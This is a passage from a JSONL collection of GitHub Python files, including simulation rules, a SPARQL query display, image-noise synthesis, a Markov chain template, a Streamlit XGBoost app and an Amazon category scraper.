Instead, a proportion of every group of migrating agents can die at every step of the simulation.\n\n    Environmental harshness can be controlled via another rule which conditions it on the time of year (e.g., winter\n    can be harsher than summer or vice versa depending on region).\n\n    A migrating population ends its migration by settling in its destination site.\n    \"\"\"\n\n    def __init__(self, agent):\n        self.agent = agent\n        self.model = agent.model\n        with open(rule_file, 'r') as file:\n            j = json.load(file)\n            data = next((d for d in j if d['rule_type'] == type(self).__name__), {})\n            if data:\n                gq = data['group_qry']\n                if gq:\n                    data['group_qry'] = GroupQry(gq['attr'], gq['rel'],\n                        dill.loads(bytes.fromhex(gq['cond'])), gq['full'])\n                self.__dict__.update(data)\n\n    def apply(self, pop, group, iter, t):\n        if group.has_attr({'travel-time-left': 0}):\n            return self.apply_settle(pop, group, iter, t)\n        else:\n            return self.apply_keep_migrating(pop, group, iter, t)\n\n    def apply_keep_migrating(self, pop, group, iter, t):\n        migrating_groups = pop.get_groups(pop, GroupQry(cond=[lambda g: g.has_attr({'is-migrating': True})]))\n        if migrating_groups:\n            migrating_m = len(migrating_groups)\n            migrating_p = migrating_m / pop.get_mass(pop, None) * 100\n        else:\n            migrating_p = 0\n        p_death = min(self.env_harshness * self.env_harshness_death_mult +\n                      migrating_p * self.migration_death_mult, 1.0)\n        _x = pop.random.random()\n        if _x < p_death:\n            group.set('__void__', True)\n            return\n        else:\n            group.set('migration-time', pop.get_attr(group, 'migration-time') + 1)\n            group.set('travel-time-left', pop.get_attr(group, 'travel-time-left') - 1)\n            return\n\n    def apply_settle(self, pop, group, iter, t):\n        group.set('migration-time', pop.get_attr(group, 'migration-time') + 1)\n        group.set('is-migrating', False)\n        group.set('has-settled', True)\n        group.set('@', group.get('site-dst'))\n        group.delete('site-dst')\n        return\n\n    def __call__(self):\n        if not self.agent.matches_qry(self.group_qry):\n            return\n        if not self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, int) and self.model.time == self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, list):\n            if self.i[1] == 0 and self.model.time <= self.i[0]:\n                self.apply(self.model, self.agent, self.model.time, self.model.time)\n            elif self.i[0] <= self.model.time <= self.i[1]:\n                self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, set) and self.model.time in self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n","repo_name":"evankozierok/pram2mesa","sub_path":"Samples/Migration/Migration/MigrationAgent.py","file_name":"MigrationAgent.py","file_ext":"py","file_size_in_byte":16012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15635351819","text":"import justpy as jp\nimport json\nimport os\nfrom lodstorage.query import Query,QuerySyntaxHighlight, Endpoint\nfrom jpwidgets.bt5widgets import Alert,Collapsible, IconButton\nfrom spreadsheet.spreadsheet import SpreadSheetType, SpreadSheet\nimport spreadsheet\nfrom tabulate import tabulate\nfrom urllib.error import HTTPError\n\nclass QueryDisplay():\n    '''\n    display queries\n    '''\n\n    def __init__(self,app,name:str,a,filenameprefix,text,sparql,endpointConf:Endpoint):\n        '''\n        Args:\n            name(str): the name of the display and query\n            a(jp.Component): an ancestor component\n            
filenameprefix(str): the filename prefix to use\n text(str)=the text to display\n endpointConf(Endpoint): SPARQL endpoint configuration to use\n\n '''\n self.app=app\n self.name=name\n self.filenameprefix=filenameprefix\n self.text=text\n self.a=a\n self.sparql=sparql\n self.endpointConf=endpointConf\n self.queryHideShow=Collapsible(name,a=a)\n self.queryHideShow.btn.classes+=\"btn-sm col-3\"\n self.queryDiv=jp.Div(a=self.queryHideShow.body)\n self.queryBar=jp.Div(a=a,classes=\"row\",name=f\"{self.name}QuerBar\")\n self.queryTryIt=jp.Div(a=self.queryBar,classes=\"col-1\")\n self.downloadFormat=\"excel\"\n pass\n \n def generateDownloadFromLod(self,lod) -> str:\n \"\"\"\n generate a download from the given List of Dicts\n \n Args:\n lod(list): the list of Dicts\n \"\"\" \n # prepare static are of webserver to allow uploading files\n static_dir = os.path.dirname(os.path.realpath(__file__))\n qres_dir = f\"{static_dir}/qres\"\n \n os.makedirs(qres_dir, exist_ok=True)\n if self.downloadFormat in [\"excel\",\"ods\",\"csv\"]:\n # convert qres to requested format\n spreadsheetFormat=SpreadSheetType[self.downloadFormat.upper()]\n spreadsheet = SpreadSheet.create(spreadsheetFormat, self.filenameprefix) \n filename = f\"{self.filenameprefix}{spreadsheet.FILE_TYPE}\"\n spreadsheet.addTable(name=self.name, lod=lod)\n spreadsheet.saveToFile(dir_name=qres_dir, fileName=filename)\n else:\n # tabulate \n tablefmt=self.downloadFormat\n if self.downloadFormat==\"json\":\n tableResult=json.dumps(lod)\n else:\n tableResult=tabulate(lod,headers=\"keys\",tablefmt=tablefmt)\n filename= f\"{self.filenameprefix}.{tablefmt}\"\n filepath = f\"{qres_dir}/{filename}\"\n print(tableResult, file=open(filepath, 'w'))\n return filename\n \n async def onChangeDownloadFormat(self,msg:dict):\n '''\n handle the download format change\n '''\n self.downloadFormat = msg.value\n \n async def onDownloadButtonClick(self,_msg):\n '''\n handle the clicking of the download button\n '''\n try:\n alert = Alert(a=self.queryBar, text=f\"Query {self.name} for {self.text} started ... 
please wait a few seconds")\n            await self.app.wp.update()\n            query = getattr(self, \"sparqlQuery\")\n            if isinstance(query, Query):\n                lod = self.sparql.queryAsListOfDicts(query.query)\n                filename = self.generateDownloadFromLod(lod)\n                setattr(alert, \"text\", \"Download:\")\n                jp.A(text=f\"{filename}\",\n                     classes=\"\",\n                     a=alert,\n                     href=f\"/static/qres/{filename}\",\n                     download=filename,\n                     disabled=True)\n        except (BaseException,HTTPError) as ex:\n            self.app.handleException(ex)\n        await self.app.wp.update()\n        \n    def showDownload(self):\n        if getattr(self, \"downloadButton\", None) is None:\n            self.downloadButton = IconButton(iconName=\"download\",\n                                             classes=\"btn btn-primary btn-sm col-1\",\n                                             a=self.queryBar,\n                                             click=self.onDownloadButtonClick,\n                                             disabled=False)\n            self.selectContainer=jp.Div(a=self.queryBar,classes=\"col-3\")\n            self.downloadFormatSelect = self.app.createSelect(\"format\",\n                                                              value=self.downloadFormat,\n                                                              change=self.onChangeDownloadFormat,\n                                                              a=self.selectContainer)\n            for downloadFormat in [\"csv\",\"excel\",\"github\",\"html\",\"json\",\"latex\",\"mediawiki\",\"ods\"]:\n                self.downloadFormatSelect.add(jp.Option(value=downloadFormat,text=downloadFormat))\n\n\n    def showSyntaxHighlightedQuery(self,sparqlQuery,withDownload:bool=True):\n        '''\n        show a syntax highlighted Query\n\n        sparqlQuery(str): the query to show\n        queryDiv(jp.Div): the div to use for displaying\n        queryTryIt(jp.Div): the div for the tryIt button\n        '''\n        self.sparqlQuery=sparqlQuery\n        if withDownload:\n            self.showDownload()\n        qs=QuerySyntaxHighlight(sparqlQuery)\n        queryHigh=qs.highlight()\n        tryItUrlEncoded=sparqlQuery.getTryItUrl(baseurl=self.endpointConf.website,database=self.endpointConf.database)\n        self.queryDiv.inner_html=queryHigh\n        # clear div for try It\n        self.queryTryIt.delete_components()\n        self.tryItLink=jp.Link(href=tryItUrlEncoded,text=\"try it!\",title=\"try out with wikidata query service\",a=self.queryTryIt,target=\"_blank\")\n        \n","repo_name":"WolfgangFahl/pyCEURmake","sub_path":"ceurws/querydisplay.py","file_name":"querydisplay.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15369714501","text":"# coding=utf-8\r\n### This script checks whether the AntSoul private tracker (PT) is working properly ###\r\nimport urllib2\r\nimport urllib\r\nfrom os import system\r\nimport SendMail\r\nimport cookielib\r\nimport re\r\n\r\ndef testError(content):\r\n    \"\"\"\r\n    Scan the page content for error messages\r\n    :param content: the page content to scan\r\n    :return: bool, True -> Error; False -> No Error\r\n    \"\"\"\r\n    rp = re.compile(\"Memcache\"), re.compile(\"MySql Error\")\r\n    for pt in rp:\r\n        rs = pt.findall(content)\r\n        if rs:\r\n            return True\r\n    return False\r\n\r\ndef dealError(content):\r\n    print('Server Error')\r\n    SendMail.sendErrorInfo(content)  # mail out the error details\r\n\r\n# def Init():\r\n#     cj = cookielib.CookieJar()\r\n#     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\r\n#     urllib2.install_opener(opener)\r\nurl=\"https://pt.antsoul.com/login.php\"\r\ntry:\r\n    headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' }\r\n    req = urllib2.Request(url, headers = headers)\r\n    res = urllib2.urlopen(req).read().decode(\"UTF-8\")   # the returned page content\r\n    # print(res.encode(\"UTF-8\"))\r\n    \r\n    if testError(res):  # handle errors; testError returns True when an error page is detected\r\n        dealError(res)\r\n    else:\r\n        print(\"OK!\")\r\n\r\nexcept urllib2.URLError as e:\r\n    print (\"URL ERROR\\n\")\r\n    print (e.reason)\r\nexcept urllib2.HTTPError as e:\r\n    print (\"HTTP ERROR\")\r\n    print 
(e.reason)\n\n","repo_name":"WinterXMQ/Script","sub_path":"testantsoul.py","file_name":"testantsoul.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19231273969","text":"# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# Iterable example\n\n\nclass ItemIterator:\n \"\"\"Iterator class\"\"\"\n\n def __init__(self, *args) -> None:\n self.items = args\n self.__current_index = -1\n self.__items_len = len(self.items)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.__current_index += 1\n if self.__current_index < self.__items_len:\n return self.items[self.__current_index]\n raise StopIteration\n\n\nclass Items:\n \"\"\"Iterable class\"\"\"\n\n def __init__(self, *args) -> None:\n self.items = args\n\n def __len__(self):\n return len(self.items)\n\n def __iter__(self):\n return ItemIterator(*self.items)\n # return iter(self.items)\n\n\nitems = Items(1, 2, 3, 4, 5)\n\ntry:\n print(f\"Item index [3] is {items[3]}\\n\") # type: ignore\nexcept Exception as e:\n print(e)\n print()\n\nprint(\"Part 1: Iterable Execution returns values\")\n\nfor item in items:\n print(item)\n\nprint(\"\\nPart 2: Iterable Execution returns values agian\")\n\nfor item in items:\n print(item)\n\n# %%\n","repo_name":"aerosadegh/AdvancedPythonTopics","sub_path":"topics/01-class/05.3-Iterable.py","file_name":"05.3-Iterable.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38399188994","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 22 12:21:10 2019\r\n\r\n@author: Katarzyna Luszczak\r\n\"\"\"\r\n\r\nfrom Plot_Window import Plot_Window\r\n\r\nclass Histogram(Plot_Window):\r\n def __init__(self, data_in, ax_in=None):\r\n super().__init__()\r\n \r\n self.ax = ax_in or self.figure.add_subplot(111)\r\n self.data = data_in\r\n self.color_pt = 'black'\r\n self.plot()\r\n \r\n def plot(self):\r\n self.ax.hist(self.data['Length'], bins=20, range=(0,21), edgecolor='black', linewidth=1.0, normed=1, cumulative=0)\r\n self.ax.set_title('Track length distributrion - measured tracks')\r\n self.ax.set_xlabel('Track length (μm)')\r\n self.ax.set_ylabel('Frequency')\r\n self.ax.set_xlim(0, 20)\r\n self.ax.set_xticks(range(21))","repo_name":"Kasia-Lu/QtTracks","sub_path":"Histogram.py","file_name":"Histogram.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15381499391","text":"\"\"\"\n## CycleISP: Real Image Restoration Via Improved Data Synthesis\n## Syed Waqas Zamir, Aditya Arora, Salman Khan, Munawar Hayat, Fahad Shahbaz Khan, Ming-Hsuan Yang, and Ling Shao\n## CVPR 2020\n## https://arxiv.org/abs/2003.07761\n\"\"\"\n\nimport numpy as np\nimport os\nimport argparse\nfrom tqdm import tqdm\n\nimport torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nimport scipy.io as sio\nfrom networks.cycleisp import Rgb2Raw\nfrom dataloaders.data_rgb import get_rgb_data\nfrom utils.noise_sampling import random_noise_levels_dnd, random_noise_levels_sidd, add_noise\nimport utils\nimport lycon\nfrom skimage import img_as_ubyte\n\nparser = argparse.ArgumentParser(description='RGB2RAW Network: From clean RGB images, generate {RAW_clean, RAW_noisy} pairs')\nparser.add_argument('--input_dir', default='./datasets/sample_rgb_images/',\n type=str, help='Directory of clean RGB 
images')\nparser.add_argument('--result_dir', default='./results/synthesized_data/raw/',\n type=str, help='Directory for results')\nparser.add_argument('--weights', default='./pretrained_models/isp/rgb2raw.pth',\n type=str, help='Path to weights')\nparser.add_argument('--gpus', default='0', type=str, help='CUDA_VISIBLE_DEVICES')\nparser.add_argument('--save_images', action='store_true', help='Save synthesized images in result directory')\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\n\nutils.mkdir(args.result_dir+'pkl')\nutils.mkdir(args.result_dir+'png/clean')\nutils.mkdir(args.result_dir+'png/noisy')\n\ntest_dataset = get_rgb_data(args.input_dir)\ntest_loader = DataLoader(dataset=test_dataset, batch_size=4, shuffle=False, num_workers=2, drop_last=False)\n\nmodel_rgb2raw = Rgb2Raw()\n\nutils.load_checkpoint(model_rgb2raw,args.weights)\nprint(\"===>Testing using weights: \", args.weights)\n\nmodel_rgb2raw.cuda()\n\nmodel_rgb2raw=nn.DataParallel(model_rgb2raw)\n\nmodel_rgb2raw.eval()\n\nwith torch.no_grad():\n for ii, data in enumerate(tqdm(test_loader), 0):\n rgb_gt = data[0].cuda()\n filenames = data[1]\n padh = data[2]\n padw = data[3]\n ## Convert clean rgb image to clean raw image\n raw_gt = model_rgb2raw(rgb_gt) ## raw_gt is in RGGB format\n raw_gt = torch.clamp(raw_gt,0,1)\n \n ########## Add noise to clean raw images ##########\n for j in range(raw_gt.shape[0]):\n filename = filenames[j]\n shot_noise, read_noise = random_noise_levels_dnd() \n shot_noise, read_noise = shot_noise.cuda(), read_noise.cuda()\n raw_noisy = add_noise(raw_gt[j], shot_noise, read_noise, use_cuda=True)\n raw_noisy = torch.clamp(raw_noisy,0,1) ### CLIP NOISE\n variance = shot_noise * raw_noisy + read_noise\n\n #### Unpadding and saving\n clean_packed = raw_gt[j]\n clean_packed = clean_packed[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels (4 x H/2 x W/2)\n clean_unpacked = utils.unpack_raw(clean_packed.unsqueeze(0)) ## Rearrange RGGB channels into Bayer pattern\n clean_unpacked = clean_unpacked.squeeze().cpu().detach().numpy()\n lycon.save(args.result_dir+'png/clean/'+filename[:-4]+'.png',img_as_ubyte(clean_unpacked))\n\n noisy_packed = raw_noisy\n noisy_packed = noisy_packed[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels\n noisy_unpacked = utils.unpack_raw(noisy_packed.unsqueeze(0)) ## Rearrange RGGB channels into Bayer pattern\n noisy_unpacked = noisy_unpacked.squeeze().cpu().detach().numpy()\n lycon.save(args.result_dir+'png/noisy/'+filename[:-4]+'.png',img_as_ubyte(noisy_unpacked))\n\n variance_packed = variance[:,padh[j]//2:-padh[j]//2,padw[j]//2:-padw[j]//2] ## RGGB channels\n\n dict_ = {}\n dict_['clean'] = clean_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['noisy'] = noisy_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['variance'] = variance_packed.cpu().detach().numpy() ## (4 x H/2 x W/2)\n dict_['shot_noise'] = shot_noise.cpu().detach().numpy()\n dict_['read_noise'] = read_noise.cpu().detach().numpy()\n utils.save_dict(dict_, args.result_dir+'pkl/'+filename[:-4]+'.pkl')\n","repo_name":"swz30/CycleISP","sub_path":"generate_raw_data.py","file_name":"generate_raw_data.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":454,"dataset":"github-code","pt":"52"} +{"seq_id":"34924795754","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn \r\nimport xgboost as 
xg\r\nimport streamlit as st\r\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nst.markdown('', unsafe_allow_html=True)\r\n\r\nst.title(\"Bank Marketing Campaign 🏦\")\r\nst.subheader(\"Predict Either New Customer will subscribed for term Deposit or Not??\")\r\nst.image(\"banking-marketing.jpg\")\r\nst.subheader(\"Enter the Customer Bank Details\")\r\ndf = pd.read_csv(\"bank_data.csv\")\r\n\r\nage = st.number_input(\"Enter the Age \",min_value=0,max_value=100,step=1)\r\njob = st.selectbox(\"Job Type\",('admin.', 'technician', 'services', 'management', 'retired', 'blue-collar',\r\n 'unemployed', 'entrepreneur', 'housemaid', 'unknown', 'self-employed',\r\n 'student'))\r\nmarital = st.selectbox(\"Marital\",('married', 'single', 'divorced'))\r\neducation = st.selectbox(\"Education Type\",('secondary', 'tertiary', 'primary', 'unknown'))\r\ndefault = st.selectbox(\"Has credit in default?\",('yes', 'no'))\r\nbalance = st.slider(\"Enter your Bank Balance(RS) \",min_value=0,max_value=100000,step=10)\r\nhousing = st.selectbox(\"Have Any Housing loan?\",('yes', 'no'))\r\nloan = st.selectbox(\"Have Any Personal loan?\",('yes', 'no'))\r\n\r\nst.subheader(\"Enter Info regarding Current Campaign\")\r\ncontact = st.selectbox(\"Contact Type\",('unknown', 'cellular', 'telephone'))\r\nday = st.slider(\"Enter Day \",min_value=0,max_value=35,step=1)\r\nmonth = st.selectbox(\"Month\",('may',\r\n 'jun',\r\n 'jul',\r\n 'aug',\r\n 'oct',\r\n 'nov',\r\n 'dec',\r\n 'jan',\r\n 'feb',\r\n 'mar',\r\n 'apr',\r\n 'sep'))\r\nduration = st.number_input(\"Call Duration (Sec)\",min_value=0,max_value=10000,step=5)\r\ncampaign = st.slider(\"No of contact performed during this Compaign?\",min_value=0,max_value=30,step=1)\r\nprevious = st.slider(\"No of contact performed in previous Compaign?\",min_value=0,max_value=30,step=1)\r\npoutcome = st.selectbox(\"Outcome of Previous Campaign\",('unknown', 'other', 'failure', 'success'))\r\n\r\nst.write(\"Note: If customer is New for this campaign, poutcome will be unknown & previous contact=0\")\r\nst.write(\"\")\r\n\r\n\r\n#ordinal encoding \r\ndic_bin = {\"yes\":1,\"no\":0}\r\ndic_contact={'unknown': 0, 'cellular': 1, 'telephone': 2}\r\ndic_month={'sep': 0, 'apr': 1, 'mar': 2, 'feb': 3, 'jan': 4, 'dec': 5, 'nov': 6, 'oct': 7, 'aug': 8, 'jul': 9, 'jun': 10, 'may': 11}\r\ndic_poutcome={'success': 0, 'unknown': 1, 'other': 2, 'failure': 3}\r\n\r\n#Train model\r\nX = df.drop('deposit',axis=1)\r\nY = df['deposit']\r\n\r\n#StratifiedShuffleSplit\r\nsss = StratifiedShuffleSplit(n_splits=1,test_size=0.3,random_state=1)\r\nfor train_index,test_index in sss.split(X,Y):\r\n train_df = df.loc[train_index]\r\n test_df = df.loc[test_index]\r\n\r\n#Train and Test dataset\r\nX_train = train_df.drop(\"deposit\",axis=1)\r\nY_train = train_df['deposit']\r\n\r\nX_test = test_df.drop(\"deposit\",axis=1)\r\nY_test = test_df['deposit']\r\n\r\n#Transformer\r\n#Transfoermer1 -- One Hot Encoding\r\ntrf1 = ColumnTransformer([\r\n ('ohe',OneHotEncoder(sparse=False,handle_unknown='ignore'),[1,2,3])\r\n],remainder='passthrough')\r\n\r\n#Transfoermer2 -- Scaling \r\ntrf2 = ColumnTransformer(\r\n transformers=[('scaler', StandardScaler(), [0,-1])],\r\nremainder='passthrough'\r\n)\r\n\r\n#Transofermer 3 -- model \r\ntrf3 = 
xg.XGBClassifier(n_estimators=80, learning_rate=0.1, gamma=0, subsample=0.75,colsample_bytree=1, max_depth=5)\r\n\r\n#Pipeline\r\npipe = Pipeline([\r\n    ('trf1',trf1),\r\n    ('trf2',trf2),\r\n    ('trf3',trf3)\r\n])\r\n\r\n#Train model with 70% data set\r\npipe.fit(X_train,Y_train)\r\n\r\n#accuracy\r\ny_pred = pipe.predict(X_test)\r\nscore = accuracy_score(Y_test,y_pred)\r\nst.write(score)\r\n\r\n#model prediction from user input\r\n\r\n#convert user input data into binary encode\r\ndefault1 = dic_bin[default]\r\nhousing1 = dic_bin[housing]\r\nloan1 = dic_bin[loan]\r\ncontact1 = dic_contact[contact]\r\nmonth1 = dic_month[month]\r\npoutcome1 = dic_poutcome[poutcome]\r\n\r\n#Predict complete new test data\r\n#test_input2 = np.array([25,'blue-collar','married','primary',0, 5000,0,1,1,9,11,921,10,2,2],dtype=object).reshape(1,15)\r\ntest_input = np.array([age,job,marital,education,default1, balance,housing1,loan1,contact1,day,month1,duration,campaign,previous,poutcome1],dtype=object).reshape(1,15)\r\ndf4 = pd.DataFrame(test_input,columns=X_train.columns)\r\n\r\n#predict output\r\nres = pipe.predict(df4)[0]\r\nst.write(res)\r\nst.write(score)\r\n","repo_name":"karanchinch10/Bank-Marketing-Campaign-ML","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36040013349","text":"#############################\n# Markov chain\n# MCM2018 Python code template, SJTU\n# By: Yue Ye\n#############################\n\n# ------------------------------------------------------------\n# Notes on the input data:\n# 1. Since the number of states in a Markov chain and its length vary, this program stores them in a vector\n# 2. Simply put, a vector is a variable-length array; see the documentation for the methods it provides\n# 3. Visualization in C++ is a real pain; use the Python or MATLAB code if you need plots\n# ------------------------------------------------------------\n\nimport numpy as np\nfrom random import random\n\n\n# The Markov function takes a and m as inputs, where m is the total number of states in the process\n# a is a list of arbitrary length; each entry is a state\n# For efficiency the function does no error checking: make sure every entry of a lies in [0, m-1]\n# Returns an m-by-m matrix: the transition matrix\ndef Markov(a,m):\n    res = np.zeros([m, m])  # np.ndarray([m, m]) would start from uninitialized memory\n    n = len(a)\n    for i in range(n-1):\n        res[a[i],a[i+1]] += 1\n    for i in range(m):\n        sum = 0\n        for j in range(m):\n            sum += res[i, j]\n        if sum == 0:\n            for j in range(m):\n                res[i, j] = 1/m\n        else:\n            for j in range(m):\n                res[i, j] /= sum\n\n    return res\n\n\n# The Generate function takes trans, n and start as inputs,\n# n is the desired length of the generated Markov process\n# start is the initial state\n# trans is the transition matrix\n# For efficiency the function does no error checking: make sure every row of the transition matrix sums to 1,\n# start is a valid state, and n is positive\n# Returns the generated Markov process\ndef Generate(trans,n,start):\n    ans = []\n    m = len(trans)\n    prev = start\n    for i in range(n):\n        next = m-1\n        pos = random()\n        for j in range(m-1):\n            if pos < trans[prev, j]:\n                next = j\n                break\n            else:\n                pos -= trans[prev,j]\n        ans.append(next)\n        prev = next\n    return ans\n\n\nif __name__ == '__main__':\n    a = [0,0,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,0,1,0,0,0]\n    b = a\n    t = Markov(b, 2)\n    g = Generate(t, 1000000, 0)\n    res = Markov(g, 2)\n    for i in res:\n        for j in i:\n            print(j, \" \\n\")\n","repo_name":"KyleYueye/Python-Codes","sub_path":"DGD_index/Markov.py","file_name":"Markov.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36802095731","text":"import requests\nimport queue\nimport random\nfrom lxml import etree\nimport threading\n\ndef find(m,que_root,que_1):\n    res = response(m[0])\n    lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/ul[1]//li\")\n    # ul = res.xpath(\"//span[@class='zg_selected']/../following-sibling::ul[1]/li\")\n    if lis:\n        for i in 
lis:\n w = list()\n au1 = 'https://www.amazon.it' + i.xpath(\".//a/@href\")[0]\n w.append(au1)\n w.append(m[1] + '/' + i.xpath(\".//span[contains(@class,'a-size-small')]/text()\")[0])\n que_1.put(w)\n else:\n que_root.put(m)\n print(m)\n return que_root\n\ndef response(url):\n USER_AGENTS_LIST = [\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\",\n \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n ]\n headers = {\n 'User-Agent': random.choice(USER_AGENTS_LIST),\n }\n answer = requests.get(url, headers=headers)\n res = etree.HTML(answer.text)\n return res\n\ndef index(url,que_root,que_1):\n res = response(url)\n # ul = res.xpath(\"//span[@class='zg_selected']/../following-sibling::ul[1]\")\n # lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/li/following-sibling::ul[1]/li\")\n lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/ul[1]//li\")\n if lis:\n for li in lis:\n au1 = 'https://www.amazon.it' + li.xpath(\".//a/@href\")[0]\n at0 = li.xpath(\".//span[contains(@class,'a-size-small')]/text()\")[0]\n at1 = 'Elettronica' + '/' + at0\n if at0 == 'Garanzie':\n continue\n que_1.put([au1,at1])\n return que_1\n\ndef get_1(que_1,que_root):\n while True:\n if not que_1.empty():\n m = que_1.get()\n que_root = find(m,que_root,que_1)\n else:\n break\n return que_root\n\n\ndef main():\n a = [('url','title'),]\n url = 'https://www.amazon.it/s/ref=sr_pg_1?rh=n%3A412609031%2Cp_n_availability%3A490214031&bbn=412609031&ie=UTF8&qid='\n global que_root,que_1\n que_root = queue.Queue()\n que_1= queue.Queue()\n que_1 = index(url,que_root,que_1)\n # que_root = get_1(que_1,que_root)\n u = que_1.qsize()\n print(u)\n for i in range(1,u+1):\n t = 
threading.Thread(target=get_1,args=(que_1,que_root))\n        t.start()\n        print(\"Thread %s started\" % i)\n\n    # join every worker; the original joined only the last-created thread u times\n    for t in threading.enumerate():\n        if t is not threading.main_thread():\n            t.join()\n    f = open('a.csv','a+',encoding='utf_8')\n    while True:\n        if que_root.empty():\n            break\n        else:\n            o = que_root.get()\n            a.append(o)\n    for i in a:\n        for j in range(2):\n            if j == 0:\n                f.write(i[0])\n                f.write(',')\n            else:\n                x = i[1]\n                x = x.replace(',', ',')  # swap ASCII commas for fullwidth ones so the CSV stays intact\n                f.write(x)\n                f.write('\\n')\n    f.close()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"HUYANAS/Amazon---JS_Listing","sub_path":"amazon_it/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13712359593","text":"import os\nfrom os.path import join\n\nclass EpubHelper(): \n    def __init__(self) -> None:\n        pass \n\n    # NOTE: the markup of this template was lost when the snippet was extracted;\n    # the tags below are a minimal XHTML shell reconstructed around the 